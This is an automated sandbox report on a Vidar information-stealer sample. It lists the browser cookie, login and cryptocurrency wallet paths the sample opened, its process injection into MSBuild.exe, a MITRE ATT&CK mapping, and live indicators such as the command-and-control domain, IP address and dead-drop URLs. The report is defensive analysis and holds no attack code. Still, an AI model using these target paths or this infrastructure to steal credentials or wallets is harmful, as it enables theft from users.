Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 2000, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 1.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.102cae0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.102cae0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.1000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2000, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C680C40 sqlite3_bind_zeroblob,		1_2_6C680C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C680D60 sqlite3_bind_parameter_name,		1_2_6C680D60

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	511 Process Injection	3 Obfuscated Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	22 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Software Packing	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	54 System Information Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	151 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	511 Process Injection	Cached Domain Credentials	12 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	44%	Virustotal		Browse
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sql[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
s-part-0017.t-0009.t-msedge.net	0%	Virustotal	Browse
lade.petperfectcare.com	0%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://t.me/ae5ed	100%	URL Reputation	malware
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199780418869	100%	URL Reputation	malware
http://cowod.hopto.org_DEBUG.zip/c	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	0%	URL Reputation	safe
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
http://www.mozilla.com/en-US/blocklist/	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	0%, Virustotal, Browse	unknown
lade.petperfectcare.com	95.164.90.97	true	true	0%, Virustotal, Browse	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://lade.petperfectcare.com/mozglue.dll	true		unknown
http://lade.petperfectcare.com/sql.dll	true		unknown
http://lade.petperfectcare.com/	true		unknown
http://lade.petperfectcare.com/msvcp140.dll	true		unknown
http://lade.petperfectcare.com/freebl3.dll	true		unknown
http://lade.petperfectcare.com/nss3.dll	true		unknown
http://lade.petperfectcare.com/softokn3.dll	true		unknown
https://steamcommunity.com/profiles/76561199780418869	true	URL Reputation: malware	unknown
http://lade.petperfectcare.com/vcruntime140.dll	true		unknown
http://%s%s%s	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	CAAKFI.1.dr	false	URL Reputation: safe	unknown
https://t.me/ae5ed	file.exe, file.exe, 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.mozilla.com/en-US/blocklist/	MSBuild.exe, MSBuild.exe, 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr	false	0%, Virustotal, Browse	unknown
https://duckduckgo.com/ac/?q=	CAAKFI.1.dr	false	URL Reputation: safe	unknown
https://mozilla.org0/	MSBuild.exe, 00000001.00000002.3364863424.00000000203D8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	CAAKFI.1.dr	false	0%, Virustotal, Browse	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	DAECAE.1.dr	false		unknown
http://lade.petperfectcare.com/softokn3.dllCiu	MSBuild.exe, 00000001.00000002.3356483728.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	MSBuild.exe, 00000001.00000002.3356483728.0000000001009000.00000004.00000020.00020000.00000000.sdmp, DAECAE.1.dr	false	URL Reputation: safe	unknown
http://lade.petperfectcare.com:80t-Disposition:	MSBuild.exe, 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	CAAKFI.1.dr	false	URL Reputation: safe	unknown
http://upx.sf.net	Amcache.hve.1.dr	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	CAAKFI.1.dr	false	URL Reputation: safe	unknown
http://lade.petperfectcare.com/freebl3.dllWiy	MSBuild.exe, 00000001.00000002.3356483728.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	CAAKFI.1.dr	false	URL Reputation: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	MSBuild.exe, 00000001.00000002.3356483728.0000000001009000.00000004.00000020.00020000.00000000.sdmp, DAECAE.1.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	HIIIJD.1.dr	false	URL Reputation: safe	unknown
http://lade.petperfectcare.com:80/sql.dll	MSBuild.exe, 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	CAAKFI.1.dr	false	URL Reputation: safe	unknown
http://cowod.hopto.org_DEBUG.zip/c	file.exe, 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://lade.petperfectcare.com/sql.dllIs	MSBuild.exe, 00000001.00000002.3356483728.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	MSBuild.exe, 00000001.00000002.3356483728.0000000001009000.00000004.00000020.00020000.00000000.sdmp, DAECAE.1.dr	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	MSBuild.exe, 00000001.00000002.3356483728.0000000001009000.00000004.00000020.00020000.00000000.sdmp, DAECAE.1.dr	false	URL Reputation: safe	unknown
http://lade.petperfectcare.com/y	MSBuild.exe, 00000001.00000002.3356483728.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://lade.petperfectcare.com:80nfwqnfwovfdkhttps://steamcommunity.com/profiles/76561199780418869u5	file.exe, 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	true		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	CAAKFI.1.dr	false	URL Reputation: safe	unknown
http://lade.petperfectcare.com/softokn3.dll3i%	MSBuild.exe, 00000001.00000002.3356483728.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	HIIIJD.1.dr	false	URL Reputation: safe	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	MSBuild.exe, 00000001.00000002.3356483728.0000000001009000.00000004.00000020.00020000.00000000.sdmp, DAECAE.1.dr	false	URL Reputation: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	MSBuild.exe, 00000001.00000002.3356483728.0000000001009000.00000004.00000020.00020000.00000000.sdmp, DAECAE.1.dr	false		unknown
https://support.mozilla.org	HIIIJD.1.dr	false	URL Reputation: safe	unknown
https://t.me/ae5edu55uhttps://steamcommunity.com/profiles/76561199780418869sql.dllsqlp.dllMozilla/5.	file.exe, 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	true		unknown
http://lade.petperfectcare.com:80	file.exe, file.exe, 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	CAAKFI.1.dr	false	URL Reputation: safe	unknown
http://www.sqlite.org/copyright.html.	MSBuild.exe, 00000001.00000002.3364521729.000000001FE5D000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3361102109.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.1.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
95.164.90.97	lade.petperfectcare.com	Gibraltar		39762	VAKPoltavaUkraineUA	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1527563
Start date and time:	2024-10-07 03:14:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/28@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 99 Number of non-executed functions: 247
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 192.229.221.95, 4.245.163.56, 93.184.221.240, 52.165.164.15, 40.69.42.241, 184.28.90.27, 52.149.20.212
Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.afd.azureedge.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, azureedge-t-prod.trafficmanager.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
21:15:33	API Interceptor	1x Sleep call for process: MSBuild.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	zncaKWwEdq.exe	Get hash	malicious	Vidar	Browse	13.107.246.45
	http://chiso.dev/	Get hash	malicious	Unknown	Browse	13.107.246.45
	http://buddycities.com/	Get hash	malicious	Unknown	Browse	13.107.246.45
	http://buckboosters.com/	Get hash	malicious	Unknown	Browse	13.107.246.45
	qtYuyATh0U.exe	Get hash	malicious	XWorm	Browse	13.107.246.45
	https://ln.run/qHANs	Get hash	malicious	Unknown	Browse	13.107.246.45
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	13.107.246.45
	Pvh6OAKuBe.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	http://revsolsavenue.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	http://gauravchauhan25.github.io/Netflix-Clone	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
fp2e7a.wpc.phicdn.net	file.exe	Get hash	malicious	Stealc	Browse	192.229.221.95
	CR0QGWXdDl.exe	Get hash	malicious	Stealc, Vidar	Browse	192.229.221.95
	https://maxask.com	Get hash	malicious	Unknown	Browse	192.229.221.95
	SecuriteInfo.com.Trojan.DownLoader47.42925.26493.18247.exe	Get hash	malicious	Amadey	Browse	192.229.221.95
	zncaKWwEdq.exe	Get hash	malicious	Vidar	Browse	192.229.221.95
	http://chiso.dev/	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://buddycities.com/	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://buckboosters.com/	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://wchckwl.org/	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://www.ngdhqw.blogspot.de/	Get hash	malicious	GRQ Scam	Browse	192.229.221.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
VAKPoltavaUkraineUA	bind.aspx.exe	Get hash	malicious	Vidar	Browse	95.164.119.162
	SecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exe	Get hash	malicious	Vidar	Browse	95.164.119.162
	Unlock_Tool_5.0.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	95.164.119.162
	81bl0ZlcJ3.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	95.164.119.162
	ejH1Ma9DnJ.exe	Get hash	malicious	LummaC, Vidar	Browse	95.164.119.162
	xnfvsO7kVN.exe	Get hash	malicious	LummaC, Vidar	Browse	95.164.119.162
	1p5yg5LO0h.exe	Get hash	malicious	Vidar	Browse	95.164.119.162
	file.exe	Get hash	malicious	LummaC, PureLog Stealer, Vidar	Browse	95.164.119.162
	file.exe	Get hash	malicious	LummaC, PureLog Stealer, Stealc, Vidar	Browse	95.164.119.162
	file.exe	Get hash	malicious	LummaC, PureLog Stealer, Vidar	Browse	95.164.119.162

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	file.exe	Get hash	malicious	Stealc	Browse	23.1.237.91
	SecuriteInfo.com.Trojan.DownLoader47.42925.26493.18247.exe	Get hash	malicious	Amadey	Browse	23.1.237.91
	Camtech_Korea_Invoice_2024.html	Get hash	malicious	HTMLPhisher	Browse	23.1.237.91
	zncaKWwEdq.exe	Get hash	malicious	Vidar	Browse	23.1.237.91
	http://buddycities.com/	Get hash	malicious	Unknown	Browse	23.1.237.91
	http://vpnpanda.org/	Get hash	malicious	Unknown	Browse	23.1.237.91
	http://revsolsavenue.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	23.1.237.91
	http://m4xnk.github.io/netflix-clone-by-m4xnk	Get hash	malicious	HTMLPhisher	Browse	23.1.237.91
	http://netzerosystem00.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	23.1.237.91
	http://barik-ankita.github.io/Netflix-clone	Get hash	malicious	HTMLPhisher	Browse	23.1.237.91
28a2c9bd18a11de089ef85a160da29e4	file.exe	Get hash	malicious	Stealc	Browse	13.107.246.45
	CR0QGWXdDl.exe	Get hash	malicious	Stealc, Vidar	Browse	13.107.246.45
	https://maxask.com	Get hash	malicious	Unknown	Browse	13.107.246.45
	file.exe	Get hash	malicious	Credential Flusher	Browse	13.107.246.45
	SecuriteInfo.com.Trojan.DownLoader47.42925.26493.18247.exe	Get hash	malicious	Amadey	Browse	13.107.246.45
	Camtech_Korea_Invoice_2024.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	zncaKWwEdq.exe	Get hash	malicious	Vidar	Browse	13.107.246.45
	http://chiso.dev/	Get hash	malicious	Unknown	Browse	13.107.246.45
	http://buddycities.com/	Get hash	malicious	Unknown	Browse	13.107.246.45
	http://buckboosters.com/	Get hash	malicious	Unknown	Browse	13.107.246.45

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	CR0QGWXdDl.exe	Get hash	malicious	Stealc, Vidar	Browse
	MSCy5UvBYg.exe	Get hash	malicious	LummaC, Amadey, Stealc, Vidar	Browse
	E7Bu6a7eve.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Clipboard Hijacker, Stealc, Vidar	Browse
	cmBxQ7gA5a.exe	Get hash	malicious	Vidar	Browse
	vmgon5Zqja.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	CR0QGWXdDl.exe	Get hash	malicious	Stealc, Vidar	Browse
	MSCy5UvBYg.exe	Get hash	malicious	LummaC, Amadey, Stealc, Vidar	Browse
